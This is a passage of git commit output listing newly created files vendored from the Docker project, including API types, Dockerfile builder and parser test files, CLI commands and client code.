vendor/github.com/docker/docker/api/swagger.yaml create mode 100644 vendor/github.com/docker/docker/api/templates/server/operation.gotmpl create mode 100644 vendor/github.com/docker/docker/api/types/auth.go create mode 100644 vendor/github.com/docker/docker/api/types/backend/backend.go create mode 100644 vendor/github.com/docker/docker/api/types/blkiodev/blkio.go create mode 100644 vendor/github.com/docker/docker/api/types/client.go create mode 100644 vendor/github.com/docker/docker/api/types/configs.go create mode 100644 vendor/github.com/docker/docker/api/types/container/config.go create mode 100644 vendor/github.com/docker/docker/api/types/container/container_create.go create mode 100644 vendor/github.com/docker/docker/api/types/container/container_update.go create mode 100644 
vendor/github.com/docker/docker/api/types/container/container_wait.go create mode 100644 vendor/github.com/docker/docker/api/types/container/host_config.go create mode 100644 vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go create mode 100644 vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go create mode 100644 vendor/github.com/docker/docker/api/types/error_response.go create mode 100644 vendor/github.com/docker/docker/api/types/events/events.go create mode 100644 vendor/github.com/docker/docker/api/types/filters/parse.go create mode 100644 vendor/github.com/docker/docker/api/types/filters/parse_test.go create mode 100644 vendor/github.com/docker/docker/api/types/id_response.go create mode 100644 vendor/github.com/docker/docker/api/types/image_summary.go create mode 100644 vendor/github.com/docker/docker/api/types/mount/mount.go create mode 100644 vendor/github.com/docker/docker/api/types/network/network.go create mode 100644 vendor/github.com/docker/docker/api/types/plugin.go create mode 100644 vendor/github.com/docker/docker/api/types/plugin_device.go create mode 100644 vendor/github.com/docker/docker/api/types/plugin_env.go create mode 100644 vendor/github.com/docker/docker/api/types/plugin_interface_type.go create mode 100644 vendor/github.com/docker/docker/api/types/plugin_mount.go create mode 100644 vendor/github.com/docker/docker/api/types/plugin_responses.go create mode 100644 vendor/github.com/docker/docker/api/types/port.go create mode 100644 vendor/github.com/docker/docker/api/types/reference/image_reference.go create mode 100644 vendor/github.com/docker/docker/api/types/reference/image_reference_test.go create mode 100644 vendor/github.com/docker/docker/api/types/registry/authenticate.go create mode 100644 vendor/github.com/docker/docker/api/types/registry/registry.go create mode 100644 vendor/github.com/docker/docker/api/types/seccomp.go create mode 100644 
vendor/github.com/docker/docker/api/types/service_update_response.go create mode 100644 vendor/github.com/docker/docker/api/types/stats.go create mode 100644 vendor/github.com/docker/docker/api/types/strslice/strslice.go create mode 100644 vendor/github.com/docker/docker/api/types/strslice/strslice_test.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/common.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/container.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/network.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/node.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/secret.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/service.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/swarm.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/task.go create mode 100644 vendor/github.com/docker/docker/api/types/time/duration_convert.go create mode 100644 vendor/github.com/docker/docker/api/types/time/duration_convert_test.go create mode 100644 vendor/github.com/docker/docker/api/types/time/timestamp.go create mode 100644 vendor/github.com/docker/docker/api/types/time/timestamp_test.go create mode 100644 vendor/github.com/docker/docker/api/types/types.go create mode 100644 vendor/github.com/docker/docker/api/types/versions/README.md create mode 100644 vendor/github.com/docker/docker/api/types/versions/compare.go create mode 100644 vendor/github.com/docker/docker/api/types/versions/compare_test.go create mode 100644 vendor/github.com/docker/docker/api/types/versions/v1p19/types.go create mode 100644 vendor/github.com/docker/docker/api/types/versions/v1p20/types.go create mode 100644 vendor/github.com/docker/docker/api/types/volume.go create mode 100644 vendor/github.com/docker/docker/api/types/volume/volumes_create.go create mode 100644 vendor/github.com/docker/docker/api/types/volume/volumes_list.go create 
mode 100644 vendor/github.com/docker/docker/builder/builder.go create mode 100644 vendor/github.com/docker/docker/builder/context.go create mode 100644 vendor/github.com/docker/docker/builder/context_test.go create mode 100644 vendor/github.com/docker/docker/builder/context_unix.go create mode 100644 vendor/github.com/docker/docker/builder/context_windows.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/bflag.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/builder.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/command/command.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/envVarTest create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals.go create mode 100644 
vendor/github.com/docker/docker/builder/dockerfile/internals_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile create mode 100644 
vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile create mode 100644 
vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile create mode 100644 
vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go create mode 100644 
vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/support.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/support_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/utils_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/wordsTest create mode 100644 vendor/github.com/docker/docker/builder/dockerignore.go create mode 100644 vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go create mode 100644 vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerignore_test.go create mode 100644 vendor/github.com/docker/docker/builder/git.go create mode 100644 vendor/github.com/docker/docker/builder/remote.go create mode 100644 vendor/github.com/docker/docker/builder/remote_test.go create mode 100644 vendor/github.com/docker/docker/builder/tarsum.go create mode 100644 vendor/github.com/docker/docker/builder/tarsum_test.go create mode 100644 vendor/github.com/docker/docker/builder/utils_test.go create mode 100644 vendor/github.com/docker/docker/cli/cobra.go create mode 100644 vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go create mode 100644 vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/create.go create mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/checkpoint/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/cli.go create mode 100644 vendor/github.com/docker/docker/cli/command/commands/commands.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/attach.go create mode 100644 
vendor/github.com/docker/docker/cli/command/container/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/commit.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/cp.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/create.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/diff.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/exec.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/exec_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/export.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/hijack.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/kill.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/logs.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/pause.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/port.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/prune.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/ps_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/rename.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/restart.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/rm.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/run.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/start.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/stats.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/stats_helpers.go create mode 100644 
vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/stop.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/top.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/tty.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/unpause.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/update.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/utils.go create mode 100644 vendor/github.com/docker/docker/cli/command/container/wait.go create mode 100644 vendor/github.com/docker/docker/cli/command/events_utils.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/container.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/container_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/custom.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/custom_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/formatter.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/image.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/image_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/network.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/network_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/reflect.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/service.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/stats.go create mode 100644 
vendor/github.com/docker/docker/cli/command/formatter/stats_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/volume.go create mode 100644 vendor/github.com/docker/docker/cli/command/formatter/volume_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/build.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/history.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/import.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/load.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/prune.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/pull.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/push.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/save.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/tag.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/trust.go create mode 100644 vendor/github.com/docker/docker/cli/command/image/trust_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/in.go create mode 100644 vendor/github.com/docker/docker/cli/command/inspect/inspector.go create mode 100644 vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/network/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/network/connect.go create mode 100644 vendor/github.com/docker/docker/cli/command/network/create.go create mode 
100644 vendor/github.com/docker/docker/cli/command/network/disconnect.go create mode 100644 vendor/github.com/docker/docker/cli/command/network/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/network/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/network/prune.go create mode 100644 vendor/github.com/docker/docker/cli/command/network/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/demote.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/opts.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/promote.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/ps.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/node/update.go create mode 100644 vendor/github.com/docker/docker/cli/command/out.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/create.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/disable.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/enable.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/install.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/push.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/plugin/set.go create mode 100644 
vendor/github.com/docker/docker/cli/command/plugin/upgrade.go create mode 100644 vendor/github.com/docker/docker/cli/command/prune/prune.go create mode 100644 vendor/github.com/docker/docker/cli/command/registry.go create mode 100644 vendor/github.com/docker/docker/cli/command/registry/login.go create mode 100644 vendor/github.com/docker/docker/cli/command/registry/logout.go create mode 100644 vendor/github.com/docker/docker/cli/command/registry/search.go create mode 100644 vendor/github.com/docker/docker/cli/command/secret/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/secret/create.go create mode 100644 vendor/github.com/docker/docker/cli/command/secret/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/secret/ls.go create mode 100644 vendor/github.com/docker/docker/cli/command/secret/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/secret/utils.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/create.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/inspect_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/logs.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/opts.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/opts_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/parse.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/ps.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/scale.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/trust.go create mode 100644 
vendor/github.com/docker/docker/cli/command/service/update.go create mode 100644 vendor/github.com/docker/docker/cli/command/service/update_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/common.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/deploy.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/opts.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/ps.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/remove.go create mode 100644 vendor/github.com/docker/docker/cli/command/stack/services.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/init.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/join.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/join_token.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/leave.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/opts.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/opts_test.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/unlock.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go create mode 100644 vendor/github.com/docker/docker/cli/command/swarm/update.go create mode 100644 vendor/github.com/docker/docker/cli/command/system/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/system/df.go create mode 100644 vendor/github.com/docker/docker/cli/command/system/events.go create mode 100644 vendor/github.com/docker/docker/cli/command/system/info.go create mode 100644 
vendor/github.com/docker/docker/cli/command/system/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/system/prune.go create mode 100644 vendor/github.com/docker/docker/cli/command/system/version.go create mode 100644 vendor/github.com/docker/docker/cli/command/task/print.go create mode 100644 vendor/github.com/docker/docker/cli/command/trust.go create mode 100644 vendor/github.com/docker/docker/cli/command/utils.go create mode 100644 vendor/github.com/docker/docker/cli/command/volume/cmd.go create mode 100644 vendor/github.com/docker/docker/cli/command/volume/create.go create mode 100644 vendor/github.com/docker/docker/cli/command/volume/inspect.go create mode 100644 vendor/github.com/docker/docker/cli/command/volume/list.go create mode 100644 vendor/github.com/docker/docker/cli/command/volume/prune.go create mode 100644 vendor/github.com/docker/docker/cli/command/volume/remove.go create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/compose.go create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/compose_test.go create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/service.go create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/service_test.go create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/volume.go create mode 100644 vendor/github.com/docker/docker/cli/compose/convert/volume_test.go create mode 100644 vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go create mode 100644 vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go create mode 100644 vendor/github.com/docker/docker/cli/compose/loader/example1.env create mode 100644 vendor/github.com/docker/docker/cli/compose/loader/example2.env create mode 100644 vendor/github.com/docker/docker/cli/compose/loader/full-example.yml create mode 100644 vendor/github.com/docker/docker/cli/compose/loader/loader.go create mode 100644 
vendor/github.com/docker/docker/cli/compose/loader/loader_test.go create mode 100644 vendor/github.com/docker/docker/cli/compose/schema/bindata.go create mode 100644 vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json create mode 100644 vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json create mode 100644 vendor/github.com/docker/docker/cli/compose/schema/schema.go create mode 100644 vendor/github.com/docker/docker/cli/compose/schema/schema_test.go create mode 100644 vendor/github.com/docker/docker/cli/compose/template/template.go create mode 100644 vendor/github.com/docker/docker/cli/compose/template/template_test.go create mode 100644 vendor/github.com/docker/docker/cli/compose/types/types.go create mode 100644 vendor/github.com/docker/docker/cli/error.go create mode 100644 vendor/github.com/docker/docker/cli/flags/client.go create mode 100644 vendor/github.com/docker/docker/cli/flags/common.go create mode 100644 vendor/github.com/docker/docker/cli/flags/common_test.go create mode 100644 vendor/github.com/docker/docker/cli/required.go create mode 100644 vendor/github.com/docker/docker/cli/trust/trust.go create mode 100644 vendor/github.com/docker/docker/cliconfig/config.go create mode 100644 vendor/github.com/docker/docker/cliconfig/config_test.go create mode 100644 vendor/github.com/docker/docker/cliconfig/configfile/file.go create mode 100644 vendor/github.com/docker/docker/cliconfig/configfile/file_test.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/credentials.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go create mode 100644 
vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/file_store.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/native_store.go create mode 100644 vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go create mode 100644 vendor/github.com/docker/docker/client/README.md create mode 100644 vendor/github.com/docker/docker/client/checkpoint_create.go create mode 100644 vendor/github.com/docker/docker/client/checkpoint_create_test.go create mode 100644 vendor/github.com/docker/docker/client/checkpoint_delete.go create mode 100644 vendor/github.com/docker/docker/client/checkpoint_delete_test.go create mode 100644 vendor/github.com/docker/docker/client/checkpoint_list.go create mode 100644 vendor/github.com/docker/docker/client/checkpoint_list_test.go create mode 100644 vendor/github.com/docker/docker/client/client.go create mode 100644 vendor/github.com/docker/docker/client/client_mock_test.go create mode 100644 vendor/github.com/docker/docker/client/client_test.go create mode 100644 vendor/github.com/docker/docker/client/client_unix.go create mode 100644 vendor/github.com/docker/docker/client/client_windows.go create mode 100644 vendor/github.com/docker/docker/client/container_attach.go create mode 100644 vendor/github.com/docker/docker/client/container_commit.go create mode 100644 vendor/github.com/docker/docker/client/container_commit_test.go create mode 100644 vendor/github.com/docker/docker/client/container_copy.go create mode 100644 vendor/github.com/docker/docker/client/container_copy_test.go create mode 100644 vendor/github.com/docker/docker/client/container_create.go create mode 100644 vendor/github.com/docker/docker/client/container_create_test.go create mode 100644 vendor/github.com/docker/docker/client/container_diff.go 
create mode 100644 vendor/github.com/docker/docker/client/container_diff_test.go create mode 100644 vendor/github.com/docker/docker/client/container_exec.go create mode 100644 vendor/github.com/docker/docker/client/container_exec_test.go create mode 100644 vendor/github.com/docker/docker/client/container_export.go create mode 100644 vendor/github.com/docker/docker/client/container_export_test.go create mode 100644 vendor/github.com/docker/docker/client/container_inspect.go create mode 100644 vendor/github.com/docker/docker/client/container_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/container_kill.go create mode 100644 vendor/github.com/docker/docker/client/container_kill_test.go create mode 100644 vendor/github.com/docker/docker/client/container_list.go create mode 100644 vendor/github.com/docker/docker/client/container_list_test.go create mode 100644 vendor/github.com/docker/docker/client/container_logs.go create mode 100644 vendor/github.com/docker/docker/client/container_logs_test.go create mode 100644 vendor/github.com/docker/docker/client/container_pause.go create mode 100644 vendor/github.com/docker/docker/client/container_pause_test.go create mode 100644 vendor/github.com/docker/docker/client/container_prune.go create mode 100644 vendor/github.com/docker/docker/client/container_remove.go create mode 100644 vendor/github.com/docker/docker/client/container_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/container_rename.go create mode 100644 vendor/github.com/docker/docker/client/container_rename_test.go create mode 100644 vendor/github.com/docker/docker/client/container_resize.go create mode 100644 vendor/github.com/docker/docker/client/container_resize_test.go create mode 100644 